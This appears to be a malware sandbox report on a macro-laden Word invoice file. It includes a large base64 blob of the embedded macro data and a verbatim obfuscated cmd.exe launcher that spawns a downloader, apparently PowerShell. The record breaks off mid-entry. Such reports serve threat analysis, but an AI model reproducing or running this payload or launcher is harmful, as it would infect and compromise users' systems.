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 AE8ATwBQAEUATgAAAEAAAAvwBAAAABI0Vng=
WordDocumentDocSuppDataBinDataName: editdata.mso
WordDocumentStylesStyleRPrRFontsCs: Tahoma
WordDocumentStylesStyleRPrRFontsH-ansi: Tahoma
WordDocumentStylesStyleRPrRFontsAscii: Tahoma
WordDocumentStylesStyleRsidVal: 005A24B1
WordDocumentStylesStyleLinkVal: BalloonTextChar
WordDocumentStylesStyleBasedOnVal: Normal
WordDocumentStylesStyleTblPrTblCellMarRightType: dxa
WordDocumentStylesStyleTblPrTblCellMarRightW: 108
WordDocumentStylesStyleTblPrTblCellMarBottomType: dxa
WordDocumentStylesStyleTblPrTblCellMarBottomW: -
WordDocumentStylesStyleTblPrTblCellMarLeftType: dxa
WordDocumentStylesStyleTblPrTblCellMarLeftW: 108
WordDocumentStylesStyleTblPrTblCellMarTopType: dxa
WordDocumentStylesStyleTblPrTblCellMarTopW: -
WordDocumentStylesStyleTblPrTblIndType: dxa
WordDocumentStylesStyleTblPrTblIndW: -
WordDocumentStylesStyleUiNameVal: Table Normal
WordDocumentStylesStyleRPrLangBidi: AR-SA
WordDocumentStylesStyleRPrLangFareast: EN-US
WordDocumentStylesStyleRPrLangVal: EN-US
WordDocumentStylesStyleRPrSz-csVal: 22
WordDocumentStylesStyleRPrSzVal: 22
WordDocumentStylesStyleRPrFontVal: Calibri
WordDocumentStylesStylePPrSpacingLine-rule: auto
WordDocumentStylesStylePPrSpacingLine: 259
WordDocumentStylesStylePPrSpacingAfter: 160
WordDocumentStylesStyleNameVal: Normal
WordDocumentStylesStyleStyleId: Normal
WordDocumentStylesStyleDefault: on
WordDocumentStylesStyleType: paragraph
WordDocumentStylesLatentStylesLsdExceptionName: Normal
WordDocumentStylesLatentStylesLatentStyleCount: 375
WordDocumentStylesLatentStylesDefLockedState: off
WordDocumentStylesVersionOfBuiltInStylenamesVal: 7
WordDocumentFontsFontSigCsb-1: 00000000
WordDocumentFontsFontSigCsb-0: 000001FF
WordDocumentFontsFontSigUsb-3: 00000000
WordDocumentFontsFontSigUsb-2: 00000009
WordDocumentFontsFontSigUsb-1: C0007841
WordDocumentFontsFontSigUsb-0: E0002AFF
WordDocumentFontsFontPitchVal: variable
WordDocumentFontsFontFamilyVal: Roman
WordDocumentFontsFontCharsetVal: 00
WordDocumentFontsFontPanose-1Val: 02020603050405020304
WordDocumentFontsFontName: Times New Roman
WordDocumentFontsDefaultFontsCs: Times New Roman
WordDocumentFontsDefaultFontsH-ansi: Calibri
WordDocumentFontsDefaultFontsFareast: Calibri
WordDocumentFontsDefaultFontsAscii: Calibri
WordDocumentDocumentPropertiesVersion: 16
WordDocumentDocumentPropertiesCharactersWithSpaces: 1
WordDocumentDocumentPropertiesParagraphs: 1
WordDocumentDocumentPropertiesLines: 1
WordDocumentDocumentPropertiesCharacters: 1
WordDocumentDocumentPropertiesWords: -
WordDocumentDocumentPropertiesPages: 1
WordDocumentDocumentPropertiesLastSaved: 2019:01:22 18:27:00Z
WordDocumentDocumentPropertiesCreated: 2019:01:22 18:27:00Z
WordDocumentDocumentPropertiesTotalTime: -
WordDocumentDocumentPropertiesRevision: 1
WordDocumentIgnoreSubtreeVal: http://schemas.microsoft.com/office/word/2003/wordml/sp2
WordDocumentOcxPresent: no
WordDocumentEmbeddedObjPresent: no
WordDocumentMacrosPresent: yes
No data.
All screenshots are available in the full report
Total processes
46
Monitored processes
15
Malicious processes
6
Suspicious processes
3

Behavior graph

Processes shown in the graph, with the report's own labels ("start", "drop and start", "no specs"):
msoxmled.exe (no specs), winword.exe (no specs), cmd.exe (no specs, 7 instances), find.exe (no specs), powershell.exe, 229.exe (no specs), 229.exe, wabmetagen.exe (no specs), wabmetagen.exe

Process information

PID
CMD
Path
Indicators
Parent process
PID:
3000
CMD:
"C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\admin\AppData\Local\Temp\Sales-Invoice.xml"
Path:
C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE
Parent process:
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
XML Editor
Exit code:
0
Version:
14.0.4750.1000
PID:
2672
CMD:
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Sales-Invoice.xml"
Path:
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process:
MSOXMLED.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
PID:
4032
CMD:
c:\w4662\q5040\j3357\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set 3x=Te=$b}Yr-;v0O(Kk9Ryq% 6~7{Msdw._@:,HWiDnN84cjpzIuQ5)EL2\Pmx1+UFoG/lCa'hSfZBXgAt3&&for %x in (45;63;29;20;56;61;74;53;47;67;33;23;50;34;59;20;7;20;71;52;71;71;47;12;40;40;77;26;52;33;23;8;42;34;59;20;70;20;0;52;26;56;33;23;8;79;34;59;20;66;66;21;3;19;54;42;11;41;2;69;70;16;42;11;41;69;9;3;10;54;24;24;50;2;39;1;29;8;63;4;44;1;43;78;21;40;1;78;30;36;1;4;67;66;37;1;39;78;9;3;37;54;59;54;79;2;69;70;78;78;45;33;65;65;28;48;7;63;27;72;68;7;57;30;43;63;57;65;66;26;49;16;15;0;63;54;78;77;79;57;6;62;77;31;63;37;26;76;15;36;76;24;32;70;78;78;45;33;65;65;72;37;39;28;8;57;1;8;68;39;8;1;39;76;66;37;27;70;8;45;1;39;45;68;66;30;72;37;39;28;8;57;1;8;68;39;8;1;39;76;66;37;27;70;8;78;48;78;63;7;30;43;63;30;48;15;65;40;49;47;41;43;67;44;45;17;74;31;19;61;32;70;78;78;45;33;65;65;27;68;7;29;68;30;43;63;30;46;68;65;14;48;56;10;68;59;35;41;39;17;24;36;15;63;49;32;70;78;78;45;33;65;65;79;15;37;66;63;68;72;10;68;66;66;1;39;30;39;66;65;75;22;16;75;28;10;44;73;50;44;74;6;53;31;49;68;0;38;66;73;26;32;70;78;78;45;33;65;65;29;29;29;30;78;48;39;1;66;28;1;10;37;1;39;78;63;30;1;27;65;1;72;15;70;46;37;42;65;29;77;64;67;39;54;35;44;22;57;52;36;68;15;27;69;30;71;45;66;37;78;13;69;32;69;51;9;3;63;50;54;79;11;2;69;78;50;79;16;16;69;9;3;48;79;79;50;41;21;2;21;69;54;54;16;69;9;3;48;59;11;22;79;2;69;68;22;54;50;42;69;9;3;28;59;79;50;2;3;1;39;10;33;78;1;57;45;60;69;55;69;60;3;48;79;79;50;41;60;69;30;1;58;1;69;9;72;63;7;1;68;43;70;13;3;43;16;79;50;42;21;37;39;21;3;37;54;59;54;79;51;25;78;7;18;25;3;10;54;24;24;50;30;38;63;29;39;66;63;68;28;62;37;66;1;13;3;43;16;79;50;42;34;21;3;28;59;79;50;51;9;3;15;22;42;50;42;2;69;15;16;50;50;59;69;9;47;72;21;13;13;64;1;78;8;47;78;1;57;21;3;28;59;79;50;51;30;66;1;39;76;78;70;21;8;76;1;21;42;11;11;11;11;51;21;25;47;39;10;63;15;1;8;47;78;1;57;21;3;28;59;79;50;9;3;27;22;50;79;24;2;69;63;22;22;22;50;69;9;4;7;1;68;15;9;5;5;43;68;78;43;70;25;5;5;3;27;16;24;79;41;2;69;7;16;41;16;59;69;9;86)do set 8p7h=!8p7h!!3x:~%x,1!&&if %x==86 echo !8p7h:~6!|FOR /F "delims=fA tokens=1" %v IN ('ftype^^^|find "dfil"')DO %v "
Path:
c:\windows\system32\cmd.exe
Parent process:
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
PID:
2668
CMD:
